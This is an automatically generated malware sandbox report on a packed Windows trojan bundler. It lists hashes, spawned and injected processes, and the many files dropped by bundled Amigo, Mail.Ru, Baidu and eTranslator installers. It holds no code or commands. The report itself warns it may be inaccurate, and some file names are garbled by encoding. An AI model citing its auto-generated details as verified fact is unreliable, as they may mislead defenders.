Trojan.Generic.12056297 (B) (Emsisoft), Trojan.Generic.12056297 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9e913b6133dc02e55a5a01a69b184321
SHA1: 9cdd087e4dad88e5f3dee1a7f0fc819a9e3ca942
SHA256: 586e862a52bd4076dda1fbbe44354f987fb7882482bc97caed11d43f6901f6bc
SSDeep: 98304:HiQcrGTjUDRwqfSauEb2ZBuZLLByeqfSauEb2ZBuZLLByvVQWrvnEVQWrvn :CQfuL6uRXg6uRXC9TE9T
Size: 8086528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, ACProtect141
Company: AirInstaller
Created at: 2014-10-28 18:50:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
taskkill.exe:1744
taskkill.exe:332
regsvr32.exe:2516
regsvr32.exe:3188
amigo.exe:1768
MailRuUpdater.exe:2192
MailRuUpdater.exe:2368
BDKVWsc.exe:2572
id1 - 34.exe:504
%original file name%.exe:928
bddownloader.exe:2316
RegSvr32.exe:4092
RegSvr32.exe:2168
RegSvr32.exe:2272
AmigoDistrib.exe:1676
netsh.exe:2480
BaiduSdTray.exe:2996
etranslator_gui_0 (6) (2).exe:1056
setup.tmp:1748
setup.exe:1304
setup.exe:380
MsiExec.exe:3808
MsiExec.exe:3132
F1023_s_30768.exe:3512
The Trojan injects its code into the following process(es):
%original file name%.exe:1504
BindEx.exe:708
BindEx.exe:248
services.exe:724
svchost.exe:1108
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process amigo.exe:1768 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\debug.log (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\1.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\2.tmp (5 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\Local State~RF9aaea.TMP (0 bytes)
The process MailRuUpdater.exe:2192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe (46100 bytes)
The process MailRuUpdater.exe:2368 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\E0E17871C3C14B87A55BC9BB6CF463C6.html (0 bytes)
The process id1 - 34.exe:504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\setup.exe (490 bytes)
The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{80C47B02-16F0-424C-920F-6B5A889D2A44}\id1 - 34.exe (1679 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{717598EB-33E7-4687-94A0-8D20DCB6D246}\etranslator_gui_0 (6) (2).exe (23407 bytes)
C:\IEXPLORE.bat (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{C1E685B2-3E0A-4D74-9161-D1B5BBD4B5FD}\AmigoDistrib.exe (380715 bytes)
%Documents and Settings%\%current user%\Desktop\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\amigo.bat (645 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Amigo.lnk (2 bytes)
The process AmigoDistrib.exe:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp\SETUP.EX_ (1697 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp\setup.exe (18208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp\CHROME.PACKED.7Z (375522 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp\SETUP.EX_ (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp\CHROME.PACKED.7Z (0 bytes)
The process BaiduSdTray.exe:2996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config (4 bytes)
C:\ (4 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086 (296 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602 (4 bytes)
%System%\wbem\Logs (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games (4 bytes)
%Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
%WinDir%\WinSxS (8 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (484 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (512 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319 (576 bytes)
%Documents and Settings%\%current user%\Desktop (4 bytes)
%WinDir%\WinSxS\Manifests (1444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp (4 bytes)
%WinDir%\Prefetch\NETSH.EXE-085CFFDE.pf (24 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (532 bytes)
%Program Files%\Common Files (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_71023.exe (12137 bytes)
%Documents and Settings%\All Users (4 bytes)
%WinDir%\Fonts (544 bytes)
%Documents and Settings%\%current user%\Local Settings (4 bytes)
%System% (4272 bytes)
%WinDir% (864 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility (4 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Total Commander (4 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\G1023_s_71023[1].exe (13860 bytes)
%Program Files% (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667 (12 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content (8 bytes)
%WinDir%\Prefetch\REGSVR32.EXE-25EEFE2F.pf (64 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%System%\config (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer (4 bytes)
%WinDir%\Temp\Perflib_Perfdata_678.dat (4 bytes)
%System%\drivers (4 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application (4 bytes)
%WinDir%\Prefetch (772 bytes)
%System%\wbem\Logs\wbemcore.log (384 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db (149 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%WinDir%\Installer (96 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db (149 bytes)
%Documents and Settings%\%current user%\Cookies (96 bytes)
%WinDir%\Prefetch\BAIDUSDTRAY.EXE-191E616B.pf (65 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (0 bytes)
The process etranslator_gui_0 (6) (2).exe:1056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\eTranslator\bzip.dll (4061 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator_preferences.json (834 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator1.crx (51 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator3.oex (51 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\sqlite3.dll (3421 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator.exe (24284 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\SWData (3833 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator_withoutzoneid.exe (29521 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\SWData_T (23407 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator2.xpi (20 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator.log (52818 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\eTranslator\bzip.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator_preferences.json (0 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator1.crx (0 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator3.oex (0 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\sqlite3.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator2.xpi (0 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\SWData (0 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\SWData_T (0 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator.exe (0 bytes)
The process BindEx.exe:708 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Desktop\百度æÂ€毒.lnk (0 bytes)
The process BindEx.exe:248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\G1023_s_71023[1].exe (1032277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dlinstlit.txt (132 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_71023.exe (582160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F1023_s_30768.exe (2142334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\test[1].txt (132 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30768[1].exe (2905069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
The process setup.tmp:1748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\baidu\is-1T895.tmp (16 bytes)
%Program Files%\baidu\unins000.dat (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I6R3T.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\is-BD508.tmp (23593 bytes)
%Program Files%\baidu\is-E3PTU.tmp (7 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\baidu\baidu.lnk (479 bytes)
%Program Files%\baidu\BindEx.ini (65 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-I6R3T.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I6R3T.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I6R3T.tmp\_isetup (0 bytes)
The process setup.exe:1304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\ok.exe (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fi.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ms.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ko.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\nl.pak (226 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\npchrome_frame.dll (15801 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pt-BR.pak (226 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hi.pak (1754 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1709.113\Installer\setup.exe (7971 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\bg.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hu.pak (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ml.dll (8 bytes)
%Documents and Settings%\%current user%\Desktop\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sk.pak (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\VisualElements\logo.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ml.pak (3679 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\th.pak (1745 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÞôýþúûðÑÂÂÑÂÂýøúø.lnk (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ã’úþýтðúтõ.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\te.pak (1805 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\am.pak (323 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\te.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pt-PT.pak (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\ppgooglenaclpluginchrome.dll (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\vi.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\gu.pak (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ar.pak (314 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ã’úþýтðúтõ.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\extensions\mailru_checker_1.2.3.crx (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\amigo.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ja.pak (282 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\agentloader.exe (115 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\MailRu\MailRuUpdater.exe (46100 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\id.pak (209 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\es-419.pak (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fa.pak (1611 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_launcher.exe (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pt-BR.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ca.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\vk.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\it.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fil.pak (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sw.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pl.pak (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ko.pak (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\icudt.dll (72365 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\resources.pak (172310 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ru.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\am.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\libglesv2.dll (6347 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\nb.pak (213 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ar.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sl.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ta.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\lv.dll (8 bytes)
%Documents and Settings%\%current user%\Desktop\Ã’úþýтðúтõ.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\da.pak (213 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\et.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\mailruupdater.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\bn.pak (1769 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\he.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\zh-CN.pak (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\en-US.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pt-PT.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\he.pak (266 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\kn.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\es.pak (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\es.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\xinput1_3.dll (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome.dll (283704 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\mr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\ffmpegsumo.dll (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\it.pak (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pl.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\vk.exe (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hi.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\ok.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ro.pak (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_child.dll (286042 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\nl.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fa.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\kn.pak (1815 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\delegate_execute.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hr.pak (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ja.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\VisualElements\smalllogo.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ta.pak (1829 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\extensions\external_extensions.json (103 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ru.pak (1642 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_frame_helper.dll (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\wow_helper.exe (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\bg.pak (1668 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ÞôýþúûðÑÂÂÑÂÂýøúø.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\el.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\lt.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fil.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sv.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\chrome.7z (1341364 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ca.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\gcswf32.dll (108196 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\tr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\d3dcompiler_46.dll (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\cs.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\master_preferences (982 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\bn.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\d3dcompiler_43.dll (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\es-419.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\zh-TW.pak (195 bytes)
